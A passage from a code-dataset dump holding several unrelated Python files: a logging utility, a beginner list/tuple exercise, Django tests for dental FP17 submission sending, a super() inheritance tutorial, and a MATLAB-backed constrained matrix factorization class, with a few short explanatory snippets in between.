log.append(\"cd \"+os.getcwd())\n log.append(\"python3 \"+\" \".join(sys.argv))\n log.append(\"#Program: \"+__main__.__file__)\n log.append(\"#Version: \"+str(self.version))\n log.append(\"#Input options: \"+str(self.filename))\n log.append(\"#**************************\")\n for sec in self.options.keys():\n log.append(\"#---\"+str(sec)+\"---\")\n for opt in self.options[sec].keys():\n log.append(\"#\"+str(opt)+\": \" + str(self.get(opt,sec)))\n if len(self.outfilename)>0:\n log.append(\"#**************************\")\n log.append(\"#Output files created:\")\n for path in self.outfilename:\n log.append(\"#%PATH% \"+path)\n log.append(\"#%HASH% \"+self.hash_file(path))\n log=[l+\"\\n\" for l in log]\n return log\n\n def show_data(self):\n \"\"\"Print log.\"\"\"\n print(*self.create_log())\n\n def check(self):\n \"\"\"Perform a consistency check on the input options.\"\"\"\n everything_ok=True\n #if(something_wrong):\n # everything_oK=False\n return everything_ok\n\n def write_log(self, new_logs, old_logs=[], file_ext=None):\n \"\"\"Write log to files.\n\n Combine all old logfiles, append the log of the actual program and save them to all new locations given.\n\n Arguments:\n old_logs {arr} -- array with old logfiles\n new_logs {arr} -- array with new logfiles to be created.\n\n Keyword Arguments:\n file_ext {str} -- if set, the file extensions in the given logfile locations are replaced by 'file_ext' before the function is executed. 
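The block loop in hash_file keeps memory usage flat for large files. An equivalent, more compact idiom uses only the standard library (iter() with a sentinel); shown here as an alternative sketch rather than a drop-in replacement for the method above:

import hashlib

def sha256_of(path, block_size=65536):
    file_hash = hashlib.sha256()
    with open(path, 'rb') as f:
        # iter() keeps calling f.read(block_size) until it returns b'' (the sentinel)
        for chunk in iter(lambda: f.read(block_size), b''):
            file_hash.update(chunk)
    return file_hash.hexdigest()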
(default: {None})\n \"\"\"\n old_logs=np.atleast_1d(old_logs)\n new_logs=np.atleast_1d(new_logs)\n if file_ext!=None:\n file_ext=file_ext.strip(\".\")\n old_logs=[os.path.splitext(logfile)[0]+\".\"+file_ext for logfile in old_logs]\n new_logs=[os.path.splitext(logfile)[0]+\".\"+file_ext for logfile in new_logs]\n\n old_lines=[]\n log=self.create_log()\n for old in old_logs:\n oldfile=open(old)\n old_lines.extend(oldfile.readlines())\n oldfile.close()\n # old_lines=[l for l in old_lines]\n for new in new_logs:\n newfile=open(new, \"w\")\n newfile.writelines(old_lines)\n newfile.write(\"#####################################################################################\\n\")\n newfile.write(f\"#####{os.path.basename(new)} in {os.path.dirname(new)}######\\n\")\n newfile.writelines(log)\n newfile.close()\n\n\n","repo_name":"Ockenfuss/CodeTemplates","sub_path":"MyPython/inlog/Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":10066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27228523020","text":"numeros = [1, 2, 3, 4, 5]\r\nnumeros.append('hola')\r\n\r\nnumeros.pop(5)\r\n\r\nnumeros [1, 2, 3, 4, 5]\r\n'hola' + ' ' + 'mundo'\r\n\r\n\r\nnumeros2 = [6, 7, 8, 9]\r\n\r\nlista_final = numeros + numeros2 \r\n\r\nmi_tupla = (1,2,3,4,5)\r\n","repo_name":"SlevenLio21/Practicas_Python","sub_path":"Tuplas.py","file_name":"Tuplas.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20824141374","text":"import datetime\nfrom unittest.mock import patch\nfrom opal.core.test import OpalTestCase\nfrom opal.models import Episode, Ethnicity\nfrom odonto.odonto_submissions import models\nfrom odonto.episode_categories import FP17Episode, FP17OEpisode\nfrom odonto.odonto_submissions.management.commands import send_submissions\n\nBASE_STR = \"odonto.odonto_submissions.management.commands.send_submissions\"\n\n\n@patch(BASE_STR + \".models.Submission.send\")\n@patch(BASE_STR + \".logger\")\nclass SendSubmissionEmailTestCase(OpalTestCase):\n \"\"\"\n Tests the summary email that get's sent out of everything that\n has been sent downstream\n \"\"\"\n def setUp(self):\n Ethnicity.objects.create(name=\"Other mixed background\")\n self.cmd = send_submissions.Command()\n self.patient, self.episode = self.new_patient_and_episode_please()\n self.episode.stage = \"Submitted\"\n self.episode.save()\n self.today = datetime.date.today()\n self.yesterday = self.today - datetime.timedelta(1)\n\n def test_success_fp17(self, logger, send_submission):\n Episode.objects.update(category_name=FP17Episode.display_name)\n self.cmd.handle()\n send_submission.assert_called_once_with(self.episode)\n\n def test_fail_fp17(self, logger, send_submission):\n send_submission.side_effect = ValueError(\"boom\")\n Episode.objects.update(category_name=FP17Episode.display_name)\n self.cmd.handle()\n send_submission.assert_called_once_with(self.episode)\n self.assertEqual(\n logger.info.call_args_list[1][0][0],\n f\"Sending failed for Episode {self.episode.id} with boom\"\n )\n\n def test_success_fp17o(self, logger, send_submission):\n self.episode.category_name = FP17OEpisode.display_name\n self.episode.save()\n self.patient.demographics_set.update(ethnicity_fk_id=Ethnicity.objects.first().id)\n self.episode.orthodonticassessment_set.update(\n date_of_referral=self.yesterday, date_of_assessment=self.today\n )\n 
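A detail worth knowing when reading the test signatures above: stacked @patch decorators apply bottom-up, so the decorator closest to the function (or class) supplies the first mock argument, which is why the methods receive (self, logger, send_submission) in that order. A self-contained illustration:

from unittest.mock import patch

@patch('os.getcwd')          # outer patch -> second mock argument
@patch('os.getpid')          # inner patch -> first mock argument
def demo(mock_getpid, mock_getcwd):
    import os
    mock_getpid.return_value = 42
    mock_getcwd.return_value = '/tmp'
    return os.getpid(), os.getcwd()

assert demo() == (42, '/tmp')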
Episode.objects.update(category_name=FP17OEpisode.display_name)\n self.cmd.handle()\n send_submission.assert_called_once_with(self.episode)\n\n def test_fail_fp17o(self, logger, send_submission):\n send_submission.side_effect = ValueError(\"boom\")\n self.episode.category_name = FP17OEpisode.display_name\n self.episode.save()\n self.patient.demographics_set.update(ethnicity_fk_id=Ethnicity.objects.first().id)\n self.episode.orthodonticassessment_set.update(\n date_of_referral=self.yesterday, date_of_assessment=self.today\n )\n Episode.objects.update(category_name=FP17OEpisode.display_name)\n self.cmd.handle()\n self.assertEqual(\n logger.info.call_args_list[1][0][0],\n f\"Sending failed for Episode {self.episode.id} with boom\"\n )\n\n def test_none(self, logger, send_submission):\n Episode.objects.all().delete()\n self.assertFalse(send_submission.called)\n\n\nclass SendSubmissionGetQSTestCase(OpalTestCase):\n \"\"\"\n Tests that the correct episodes are being sent downstream\n \"\"\"\n def setUp(self):\n self.cmd = send_submissions.Command()\n self.patient, self.fp17_episode = self.new_patient_and_episode_please()\n today = datetime.date.today()\n\n # an fp17 episode ready to be submitted\n self.fp17_episode.stage = FP17Episode.SUBMITTED\n self.fp17_episode.category_name = FP17Episode.display_name\n self.fp17_episode.save()\n\n # an fp17o episode ready to be submitted\n self.fp17o_episode = self.patient.create_episode()\n self.fp17o_episode.stage = FP17OEpisode.SUBMITTED\n self.fp17o_episode.category_name = FP17OEpisode.display_name\n self.fp17o_episode.save()\n Ethnicity.objects.create(name=\"Other mixed background\")\n self.fp17o_episode.patient.demographics_set.update(\n ethnicity_fk_id=Ethnicity.objects.first().id\n )\n self.fp17o_episode.orthodonticassessment_set.update(\n date_of_assessment=today,\n date_of_referral=today\n )\n self.fp17o_episode.orthodontictreatment_set.update(\n date_of_completion=None\n )\n\n def test_get_fp17os_success(self):\n self.assertEqual(\n self.cmd.get_fp17os()[0],\n self.fp17o_episode\n )\n\n def test_get_fp17os_category(self):\n self.fp17o_episode.category_name = FP17Episode.display_name\n self.fp17o_episode.save()\n self.assertEqual(len(self.cmd.get_fp17os()), False)\n\n def test_get_fp17os_submitted(self):\n self.fp17o_episode.stage = FP17OEpisode.OPEN\n self.fp17o_episode.save()\n self.assertEqual(len(self.cmd.get_fp17os()), False)\n\n def test_get_fp17_qs_success(self):\n self.assertEqual(\n self.cmd.get_fp17_qs().get(),\n self.fp17_episode\n )\n\n def test_get_fp17_qs_category(self):\n self.fp17_episode.category_name = FP17OEpisode.display_name\n self.fp17_episode.save()\n self.assertFalse(self.cmd.get_fp17_qs().exists())\n\n def test_get_fp17_qs_submitted(self):\n self.fp17_episode.stage = FP17OEpisode.OPEN\n self.fp17_episode.save()\n self.assertFalse(self.cmd.get_fp17_qs().exists())\n\n\nclass FilterForNewOrFailedSinceTestCase(OpalTestCase):\n def setUp(self):\n self.cmd = send_submissions.Command()\n self.patient, self.fp17_episode = self.new_patient_and_episode_please()\n self.this_year = datetime.date(2020, 4, 1)\n self.last_year = datetime.date(2019, 4, 1)\n\n # an fp17 episode ready to be submitted\n self.fp17_episode.stage = FP17Episode.SUBMITTED\n self.fp17_episode.category_name = FP17Episode.display_name\n self.fp17_episode.save()\n\n def test_return_failed_this_tax_year(self):\n self.fp17_episode.fp17incompletetreatment_set.update(\n completion_or_last_visit=self.this_year\n )\n self.fp17_episode.submission_set.create(\n 
state=models.Submission.REJECTED_BY_COMPASS\n )\n result = self.cmd.filter_for_new_or_failed_since(\n Episode.objects.all()\n )\n self.assertEqual(\n result, [self.fp17_episode]\n )\n\n def test_return_episodes_with_no_submissions(self):\n self.fp17_episode.fp17incompletetreatment_set.update(\n completion_or_last_visit=self.this_year\n )\n result = self.cmd.filter_for_new_or_failed_since(\n Episode.objects.all()\n )\n self.assertEqual(\n result, [self.fp17_episode]\n )\n\n def test_do_not_return_old_episodes(self):\n self.fp17_episode.fp17incompletetreatment_set.update(\n completion_or_last_visit=self.last_year\n )\n self.fp17_episode.submission_set.create(\n state=models.Submission.REJECTED_BY_COMPASS\n )\n result = self.cmd.filter_for_new_or_failed_since(\n Episode.objects.all()\n )\n self.assertEqual(\n result, []\n )\n\n def test_do_not_return_episodes_already_succeeded(self):\n self.fp17_episode.fp17incompletetreatment_set.update(\n completion_or_last_visit=self.this_year\n )\n self.fp17_episode.submission_set.create(\n state=models.Submission.SUCCESS\n )\n result = self.cmd.filter_for_new_or_failed_since(\n Episode.objects.all()\n )\n self.assertEqual(\n result, []\n )\n\n def test_with_fp17o(self):\n fp17o_episode = self.patient.create_episode()\n fp17o_episode.stage = FP17OEpisode.SUBMITTED\n fp17o_episode.category_name = FP17OEpisode.display_name\n fp17o_episode.save()\n fp17o_episode.orthodonticassessment_set.update(\n date_of_assessment=self.this_year\n )\n result = self.cmd.filter_for_new_or_failed_since(\n Episode.objects.filter(category_name=FP17OEpisode.display_name)\n )\n self.assertEqual(\n result, [fp17o_episode]\n )\n\n def test_with_none(self):\n result = self.cmd.filter_for_new_or_failed_since(\n Episode.objects.none()\n )\n self.assertEqual(\n result, []\n )\n","repo_name":"odonto/odonto","sub_path":"odonto/odonto_submissions/tests/test_send_submissions.py","file_name":"test_send_submissions.py","file_ext":"py","file_size_in_byte":8312,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"40406773840","text":"### super()函数 继承,调用父类的方法\r\n\r\n# 父类\r\nclass Person():\r\n def speak(self):\r\n print('i can speak')\r\n\r\n def sing(self):\r\n print('i can sing')\r\n\r\n def rap(self):\r\n print('i can rap')\r\n\r\n def basketball(self):\r\n print('i can basketball')\r\n\r\n\r\n# 继承\r\nclass Student(Person):\r\n pass\r\n\r\nclass Student1(Person):\r\n def study(self):\r\n print('i like study')\r\n\r\nif __name__ == '__main__':\r\n # 实例化一个Student对象\r\n s = Student()\r\n s.rap()\r\n s.basketball()\r\n\r\n s1 = Student1()\r\n s1.rap()\r\n s1.study()\r\n \r\n# 调用 super().父类方法\r\nclass A:\r\n def get_name(self):\r\n return 'my name is xiaoming'\r\n\r\nclass B(A):\r\n def my_info(self):\r\n print('i am 18 years old')\r\n # 调用父类A中的get_name函数\r\n print(super().get_name())\r\n print('i like rap and basketball')\r\n\r\nif __name__ == '__main__':\r\n b = B()\r\n \r\n \"\"\"\r\n i am 18 years old\r\n my name is xiaoming\r\n i like rap and basketball\r\n \"\"\"\r\n b.my_info()\r\n\r\n## 多继承 \r\nclass A:\r\n num = 1\r\n def method(self):\r\n print('A ..method')\r\n\r\nclass B:\r\n num = 2\r\n def method(self):\r\n print('B ..method')\r\n \r\nclass C(A, B):\r\n num = 3\r\n pass\r\n\r\nif __name__ == '__main__':\r\n c = C()\r\n #print(C.__mro__) # 优先查找顺序C> A> B \r\n print(c.num) # 3\r\n c.method() # A 
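The multiple-inheritance example above (class C(A, B)) resolves c.method() to A.method because of Python's method resolution order; the commented C.__mro__ line shows the C > A > B lookup chain. A compact check of the same behaviour with stand-in classes:

class A:
    def method(self):
        return 'A'

class B:
    def method(self):
        return 'B'

class C(A, B):
    pass

assert [cls.__name__ for cls in C.__mro__] == ['C', 'A', 'B', 'object']
assert C().method() == 'A'   # A wins: C3 linearization checks C, then A, then B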
..method\r\n\r\n","repo_name":"jamincen/Python3X_Daily_question","sub_path":"7_super.py","file_name":"7_super.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18752238872","text":"#!/usr/bin/env python\r\nimport sys\r\nimport collections\r\nimport pprint as pp\r\nimport copy\r\nfrom datetime import *\r\nsys.path.insert(0, \"/home/dehajjik/workspace/src/utils\")\r\nfrom categorized_data_utils import *\r\nfrom json_utils import JsonUtils\r\nfrom date_time_utils import DateTimeUtils\r\nfrom numpy_utils import Numpy\r\nimport math\r\nimport numpy as np\r\nfrom datetime import datetime, timedelta\r\nimport scipy.io\r\nimport shutil\r\nimport subprocess\r\n\r\n\r\n\r\n\r\n'''\r\nLCBMFComputer stands for Linearly Constrained Bayesian Matrix Factorization.\r\n\r\nIt is a factorization matrix method that enable the user to specify constrains (linear constrains) on the resulted factor matrices desired.\r\n\r\nGiven a matrix X of size (m,n) and a dimensionality reduction parameter k, it finds two matrices A (m*k)and B(n*j) such that:\r\n\t- |X- A.B| <= sigma where sigma is very small\r\n\t- the elements of A (lets call them ai) verify the linear constrains indicated : coef1*ai-biais1 = 0 and coef2*ai-biais2>=0\r\n\t- the elements of B (lets call them bj) verify the linear constrains indicated : coef3*bj-biais3 = 0 and coef4*bj-biais4>=0\r\n'''\r\nclass LCBMFComputer (object):\r\n\ttemp_dir = \"/speech/dbwork/mul/students/dehajjik/tmp_matrix_data/\"\r\n\tx_matrix_mlab_name = \"x_mat\"\r\n\ta_constrains_mlab_name = \"a_cons\"\r\n\tb_constrains_mlab_name = \"b_cons\"\r\n\t\r\n\ta_matrix_mlab_name = \"a_mat\"\r\n\tb_matrix_mlab_name = \"b_mat\"\r\n\t\r\n\tmlab_ext = \".mat\"\r\n\t\r\n\tequality_key=\"eq\" \r\n\tinequality_key=\"ineq\"\r\n\tcoefs_key=\"coef\"\r\n\tbiais_key=\"biais\"\r\n\t\r\n\tmlab_lcbmf_dir_path = \"/home/dehajjik/workspace/src_mlab/lcbmf/\"\r\n\t\r\n\tshell_script_path = \"/home/dehajjik/workspace/src/data_analysis/linearly_constrained_basyesian_mf/launch_mlab_lcbmf.sh\"\r\n\t\r\n\t#the matlab function takes as input arguments path_to_matrix, path_to_a_constrains, path_to_b_constrains\r\n\tmlab_lcbmf_function_name = \"compute_lcbmf\"\r\n\t\r\n\t\r\n\t\r\n\tk_label = \"k\"\r\n\ttime_dimention = 1\r\n\tfeature_dimention = 0\r\n\t\r\n\tfeature_display_size = 20\r\n\t\r\n\t'''\r\n\tpossible values for:\r\n\t\tpretransformation_name : {\"none\" ,\"idf\", \"ldc\",\"idc\",\"idf3\", None}\r\n\t\ta_constrains_name : { \"[0,1]\", None}\r\n\t\tb_constrains_name : {\"positive, sum=1\", None}\r\n\t'''\r\n\tdef __init__(self, matrix, pretransformation_name, a_constrains_name, b_constrains_name, k):\r\n\t\tself.x_matrix_data = matrix\r\n\t\t\r\n\t\t\r\n\t\t#initialize the name of the different transformations and constranis for the lcbmf\r\n\t\tself.pretransformation_name = pretransformation_name\r\n\t\tself.a_constrains_name = a_constrains_name\r\n\t\tself.b_constrains_name = b_constrains_name\r\n\t\t\r\n\t\t\r\n\t\tself.k = 5\r\n\t\t\r\n\t\tif k!= None:\r\n\t\t\tself.k = k\r\n\t\t\r\n\t\t\r\n\t\t'''\r\n\t\tThe constrains of a is a dict that contains the 4 different keys representing the 4 different constrains to specify:\r\n\t\t\t-coefs for the equality of a\r\n\t\t\t-biais for the equality of a\r\n\t\t\t-coefs for the inequality of a\r\n\t\t\t-biais for the inequality of a\r\n\t\t'''\r\n\t\tself.a_constrains = {LCBMFComputer.equality_key+LCBMFComputer.coefs_key : 
[],\r\n\t\t\t\t\t\t\tLCBMFComputer.equality_key+LCBMFComputer.biais_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.coefs_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.biais_key : []\r\n\t\t\t\t\t\t\t}\r\n\t\t\r\n\t\t\r\n\t\t'''\r\n\t\tSame for b constrains\r\n\t\t'''\r\n\t\tself.b_constrains = {LCBMFComputer.equality_key+LCBMFComputer.coefs_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.equality_key+LCBMFComputer.biais_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.coefs_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.biais_key : []\r\n\t\t\t\t\t\t\t}\r\n\t\t\r\n\t\tself.a_matrix = None\r\n\t\tself.b_matrix = None\r\n\t\t\r\n\t\tself.rows_interpretable_output = {}\r\n\t\t\r\n\t\t\r\n\tdef compute(self):\r\n\t\t#make transformation if needed\r\n\t\t[transformed_matrix, transformation_scores_by_feature] = self._apply_pretransformation(self.x_matrix_data, self.pretransformation_name)\r\n\t\t\r\n\t\t#define the constrains\r\n\t\tself._define_constrains(self.a_constrains_name, self.b_constrains_name)\r\n\t\t\r\n\t\t\r\n\t\t#defining the paths of the different elements\r\n\t\tx_mat_path = LCBMFComputer.temp_dir+LCBMFComputer.x_matrix_mlab_name+LCBMFComputer.mlab_ext\r\n\t\ta_cons_path = LCBMFComputer.temp_dir+LCBMFComputer.a_constrains_mlab_name+LCBMFComputer.mlab_ext\r\n\t\tb_cons_path = LCBMFComputer.temp_dir+LCBMFComputer.b_constrains_mlab_name+LCBMFComputer.mlab_ext\r\n\t\ta_mat_path= LCBMFComputer.temp_dir+LCBMFComputer.a_matrix_mlab_name+LCBMFComputer.mlab_ext\r\n\t\tb_mat_path = LCBMFComputer.temp_dir+LCBMFComputer.b_matrix_mlab_name+LCBMFComputer.mlab_ext\r\n\t\t\r\n\t\t#write the matrix in the temp dir with a matlab extention\r\n\t\tself._create_dir(LCBMFComputer.temp_dir)\r\n\t\tself._write_in_mlab_format({LCBMFComputer.x_matrix_mlab_name:transformed_matrix}, x_mat_path)\r\n\t\tself._write_in_mlab_format(self.a_constrains, a_cons_path)\r\n\t\tself._write_in_mlab_format(self.b_constrains, b_cons_path)\r\n\t\t\r\n\t\t\r\n\t\t#execute the matlab code\r\n\t\tsubprocess.call([LCBMFComputer.shell_script_path, LCBMFComputer.mlab_lcbmf_dir_path,x_mat_path, LCBMFComputer.x_matrix_mlab_name, a_cons_path, b_cons_path, LCBMFComputer.equality_key, \r\n\t\t\t\t\t\tLCBMFComputer.inequality_key, LCBMFComputer.coefs_key, LCBMFComputer.biais_key, str(self.k), a_mat_path, b_mat_path])\r\n\t\t\r\n\t\t#read the results given by matlab from the temp dir\r\n\t\t\r\n\t\tself.a_matrix = self._load_mlab_format_unique_var(a_mat_path)\r\n\t\tself.b_matrix = self._load_mlab_format_unique_var(b_mat_path)\r\n\t\t\r\n\t\r\n\t\t\r\n\t\t#rempve the temp dir\r\n\t\tself._remove_dir(LCBMFComputer.temp_dir)\r\n\t\t\r\n\t\treturn [self.a_matrix, self.b_matrix]\r\n\t\t\r\n\t\t\r\n\tdef _apply_pretransformation(self, matrix, pretransformation_name):\r\n\t\ttransformed_trainset = np.copy(matrix)\r\n\t\t\r\n\t\t\r\n\t\tif pretransformation_name == \"none\" or pretransformation_name == None:\r\n\t\t\t#initialize the transformation scores to an array of the size of the number of features and containing all ones. 
This is equivalent to not having made any transformation\r\n\t\t\ttransformation_scores_by_feature = np.ones(np.shape(matrix)[LCBMFComputer.feature_dimention])\r\n\t\t\r\n\t\telif pretransformation_name == \"idf\":\r\n\t\t\tdo_laplace_smoothing = True\r\n\t\t\t[transformed_trainset, transformation_scores_by_feature] = Numpy.idf_matrix_transformation(matrix, LCBMFComputer.time_dimention, do_laplace_smoothing)\r\n\t\t\r\n\t\telif pretransformation_name == \"ldc\":\r\n\t\t\t[transformed_trainset, transformation_scores_by_feature] = Numpy.ldc_matrix_transformation(matrix, LCBMFComputer.time_dimention)\r\n\t\t\r\n\t\telif pretransformation_name == \"idc\":\r\n\t\t\tdo_laplace_smoothing = True\r\n\t\t\t[transformed_trainset, transformation_scores_by_feature] = Numpy.idc_matrix_transformation(matrix, LCBMFComputer.time_dimention, do_laplace_smoothing)\r\n\t\t\r\n\t\telif pretransformation_name == \"idf3\":\r\n\t\t\tdo_laplace_smoothing = True\r\n\t\t\t[transformed_trainset, transformation_scores_by_feature] = Numpy.idf3_matrix_transformation(matrix, LCBMFComputer.time_dimention, do_laplace_smoothing)\r\n\t\t\r\n\t\telse:\r\n\t\t\traise Exception(\"WRONG TRANSFORMATION EXCEPTION : the transformation \"+pretransformation_name+\" do not exist\")\r\n\t\t\t\r\n\t\treturn [transformed_trainset, transformation_scores_by_feature]\r\n\t\r\n\r\n\t'''\r\n\tfunctions dealing with the constrains of a and b are defined below\r\n\t'''\r\n\tdef _define_constrains(self, a_constrains_name, b_constrains_name):\r\n\t\tself._define_a_constrains(a_constrains_name)\r\n\t\tself._define_b_constrains(b_constrains_name)\r\n\r\n\t\t\r\n\tdef _define_a_constrains(self, constrains_name):\r\n\t\tif constrains_name == \"[0,1]\" or constrains_name == None:\r\n\t\t\tself._a_between_zero_and_one()\r\n\t\telse:\r\n\t\t\traise Exception(\"WRONG TRANSFORMATION EXCEPTION : the constrains \"+constrains_name+\" do not exist\")\r\n\t\r\n\tdef _a_between_zero_and_one(self):\r\n\t\t'''\r\n\t\tfor a_constrains we want the following:\r\n\t\t\t0<=ai<=1 this is equvalent to:\r\n\t\t\t\tai>=0 and ----------------------> identify_matrix(k)*[a1,...,ak]T - [0,.....0]T >= [0,....,0]T \r\n\t\t\t\t-ai+1>=1 ----------------------> -identify_matrix(k)*[a1,...,ak]T - [-1,.....,-1]T >= [0,....,0]T\r\n\t\t\r\n\t\tNote here that each ai represents a topic (a column) -> ai goes from 0 to k-1\r\n\t\t'''\r\n\t\ta_ineq_coef = np.concatenate((np.identity(self.k),-np.identity(self.k)),0)\r\n\t\ta_ineq_biais = np.concatenate((np.zeros((self.k,1)), -np.ones((self.k,1))),0)\r\n\t\t\r\n\t\t#no equalities for a\r\n\t\tself.a_constrains = {LCBMFComputer.equality_key+LCBMFComputer.coefs_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.equality_key+LCBMFComputer.biais_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.coefs_key : a_ineq_coef,\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.biais_key : a_ineq_biais\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\r\n\tdef _define_b_constrains(self, constrains_name):\r\n\t\tif constrains_name == \"positive, sum=1\" or constrains_name == None:\r\n\t\t\tself._b_positive_sum_to_one()\r\n\t\telse:\r\n\t\t\traise Exception(\"WRONG TRANSFORMATION EXCEPTION : the constrains \"+constrains_name+\" do not exist\")\r\n\t\r\n\tdef _b_positive_sum_to_one(self):\r\n\t\t'''\r\n\t\tfor b_constrains we want the following:\r\n\t\t1- bi >= 0-----------------------------------> identify_matrix(k)*[b1,...,bk]T - [0,.....0]T >= [0,....,0]T\r\n\t\t2- Sum bi = 1 ------------------------------> [1,.......,1] * [b1,...,bk]T -1 = 
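The stacked-identity construction above encodes the box constraint 0 <= a_i <= 1 in the generic form coef @ a - biais >= 0. A quick standalone numeric check of that encoding, using the same shapes for k = 3:

import numpy as np

k = 3
coef = np.concatenate((np.identity(k), -np.identity(k)), 0)        # (2k, k)
biais = np.concatenate((np.zeros((k, 1)), -np.ones((k, 1))), 0)    # (2k, 1)

a_ok = np.array([[0.0], [0.5], [1.0]])
a_bad = np.array([[1.2], [0.5], [0.0]])    # violates a_i <= 1
assert np.all(coef @ a_ok - biais >= 0)
assert not np.all(coef @ a_bad - biais >= 0)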
0\r\n\t\t'''\r\n\t\tb_ineq_coef = np.identity(self.k)\r\n\t\tb_ineq_biais = np.zeros((self.k,1))\r\n\t\t\r\n\t\tb_eq_coef = np.ones((1,self.k))\r\n\t\tb_eq_biais = 1\r\n\t\t\r\n\t\tself.b_constrains = {LCBMFComputer.equality_key+LCBMFComputer.coefs_key : b_eq_coef,\r\n\t\t\t\t\t\t\tLCBMFComputer.equality_key+LCBMFComputer.biais_key : b_eq_biais,\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.coefs_key : b_ineq_coef,\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.biais_key : b_ineq_biais\r\n\t\t\t\t\t\t\t}\r\n\r\n\t'''\r\n\tCall this method to construct a humanely readable clusters result. They are represented as a dictionary stored in the class attribute rows_interpretable_output\r\n\tfrom the realization and the id_info returns the label of this realization \r\n\tnb_features_display: for each concept the number of features to display\r\n\t'''\r\n\tdef construct_rows_interpretable_output(self, row_labels, nb_features_display):\r\n\t\t#built the interpretable output as a dictionary\r\n\t\tself.rows_interpretable_output[LCBMFComputer.k_label] = {}\r\n\t\tnb_concepts = self.k\r\n\t\tu = self.a_matrix\r\n\t\t\r\n\t\tb_sums = np.sum(self.b_matrix,1)\r\n\t\tb_norm = b_sums/(np.sum(b_sums,0)*1.0)\r\n\t\t\r\n\t\tfor k in range(0, nb_concepts):\r\n\t\t\tkth_key = str(k)+\" : \"+str(b_norm[k])\r\n\t\t\tself.rows_interpretable_output[self.k_label][kth_key]={}\r\n\t\t\tkth_output={}\r\n\t\t\tkth_vector = u[:,k]\r\n\t\t\t\r\n\t\t\tnb_rows = None\r\n\t\t\tif np.size(kth_vector) == len(row_labels):\r\n\t\t\t\tnb_rows = np.size(kth_vector)\r\n\t\t\telse:\r\n\t\t\t\traise Exception(\"NON MATCHING LENGTHS EXCEPTIONS: the columns vector has size \"+size(kth_vector)+\" whereas the corresponding number of labels is \"+len(row_labels))\r\n\t\t\t\t\r\n\t\t\t\r\n\t\t\tfor m in range(0, nb_rows):\r\n\t\t\t\tkth_output[row_labels[m]] = kth_vector[m]\r\n\t\t\t\t\r\n\t\t\t\r\n\t\t\tkth_output = collections.OrderedDict(sorted(kth_output.items(), key=lambda item: abs(item[1]), reverse= True)[0:nb_features_display]) \r\n\t\t\tself.rows_interpretable_output[self.k_label][kth_key] = kth_output\r\n\t\t\t\r\n\t\t\tself.rows_interpretable_output[self.k_label] = collections.OrderedDict(sorted(self.rows_interpretable_output[self.k_label].items(), key=lambda item: int(item[0].split(\" : \")[0]))) \r\n\t\t\t\r\n\t'''\r\n\tI/O functions defined below\r\n\t'''\r\n\tdef _write_in_mlab_format(self, numpy_object, key, path):\r\n\t\tscipy.io.savemat(path, {key:numpy_object})\r\n\t\t\r\n\tdef _write_in_mlab_format(self, var_object_dict, path):\r\n\t\tscipy.io.savemat(path, var_object_dict)\r\n\t\r\n\tdef _load_mlab_format_unique_var(self, path):\r\n\t\t#environment_var are variables added automatically by matlab so we filter them\r\n\t\tenvironment_var = ['__version__', '__header__', '__globals__']\r\n\t\tdict = scipy.io.loadmat(path)\r\n\t\tfor key in dict.keys():\r\n\t\t\tif key not in environment_var:\r\n\t\t\t\treturn dict[key]\r\n\t\r\n\t\r\n\tdef _remove_dir(self, path):\r\n\t\tshutil.rmtree(path)\r\n\t\t\r\n\tdef _create_dir(self, dir_path):\r\n\t\tif not os.path.exists(dir_path):\r\n\t\t\tos.makedirs(dir_path)","repo_name":"khalilhajji/discovering_user_habbits_from_smartphone_logs","sub_path":"external_attachements/src/data_analysis/linearly_constrained_basyesian_mf/lcbmf_computer.py","file_name":"lcbmf_computer.py","file_ext":"py","file_size_in_byte":11833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35733436911","text":"import 
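The MATLAB hand-off above round-trips arrays through .mat files; loadmat returns the saved variables plus metadata keys such as '__header__', which is why _load_mlab_format_unique_var filters them out. A minimal round-trip sketch with throwaway paths:

import os
import tempfile
import numpy as np
import scipy.io

path = os.path.join(tempfile.mkdtemp(), 'demo.mat')
scipy.io.savemat(path, {'a_mat': np.eye(2)})
loaded = scipy.io.loadmat(path)
user_vars = {key: val for key, val in loaded.items() if not key.startswith('__')}
assert list(user_vars) == ['a_mat'] and np.allclose(user_vars['a_mat'], np.eye(2))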
